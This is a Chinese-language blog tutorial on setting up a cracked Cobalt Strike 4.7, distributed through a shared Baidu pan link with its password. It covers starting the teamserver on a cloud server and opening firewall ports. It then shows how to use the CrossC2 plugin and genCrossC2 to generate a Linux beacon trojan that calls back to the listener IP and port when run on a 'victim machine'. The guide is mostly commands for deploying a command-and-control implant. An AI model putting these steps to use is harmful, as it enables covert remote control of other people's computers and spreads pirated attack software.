抱歉,您的浏览器无法访问本站
本页面需要浏览器支持(启用)JavaScript
了解详情 >

环境安装

破解包:[cobalt_strike_4.7](链接: https://pan.baidu.com/s/1c2wxXLiyjz1jvbhCOKHskw?pwd=18kq 提取码: 18kq
–来自百度网盘超级会员v6的分享) (客户端、服务器端,都用这个)

客户端: kali Linux 2021.3

服务端:腾讯云 ubuntu

服务器端

进入cs的目录

1
2
3
4
cd cobalt_strike_4.7
chmod +x teamserver
chmod +x TeamServerImage
./teamserver 本机ip 密码

服务器端防火墙设置。(自己选定一个端口,作为连接的端口)

默认端口是50050,使用默认端口的话,记得开启50050

1
2
3
4
5
# 安装firewall
sudo apt-get install firewalld
sudo systemctl start firewalld
sudo systemctl enable firewalld
sudo systemctl status firewalld
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# 开放端口
firewall-cmd --zone=public --add-port=端口号/tcp --permanent
# 关闭端口
firewall-cmd --zone=public --remove-port=端口号/tcp --permanent
# 配置生效
firewall-cmd --reload
# 查看所有开放的端口
firewall-cmd --zone=public --list-ports
# 关闭防火墙
systemctl stop firewalld.service
# 查看防火墙状态
firewall-cmd --state
# 查看监听的端口
netstat -lnpt
# 检查端口被哪个进程占用
netstat -lnpt |grep 端口号
# 查看进程的详细信息
ps 端口号
# 中止进程
kill -9 端口号

客户端

进入 Cobalt Strike 目录,执行 ./start.sh

连接成功

受害机上线(Linux) cobalt- strike4.4版本

实验对象为Linux/macOS系统,需要下载插件。

GitHub项目:https://github.com/gloxec/CrossC2


插件安装

CS客户端:下载Release v3.1.0 版本。下载genCrossC2 和CrossC2Kit就行了

将这些文件都放进新建文件夹CrossC2中,再把CrossC2文件夹放进cobalt_strike_4.4文件夹中

1
CrossC2Kit.zip  后渗透linux的插件

正常加载CS客户端,进入客户端后选择加载脚本,选择CrossC2Kit里面的CrossC2Kit_Loader.cna加载


复制服务端上cobaltstrike4.4目录下的 .cobaltstrike.beacon_keys到本地目录下。


客户端 ,将.cobaltstrike.beacon_keys放进CrossC2文件夹

生成木马

要新建一个监听器,要https的。

需要手动生成木马,CS客户端生成的不好用。

1
2
3
4
chmod +x genCrossC2.Linux 
./genCrossC2.Linux ip 52000 .cobaltstrike.beacon_keys null Linux x64 lovetutu.elf

# 就是./genCrossC2.Linux 监听器的ip 监听器的端口 cs服务器上的那个文件的路径 null Linux x64 木马的路径和名字

然后就会生成可以用的木马啦~

在受害机器上运行木马,就上线了

评论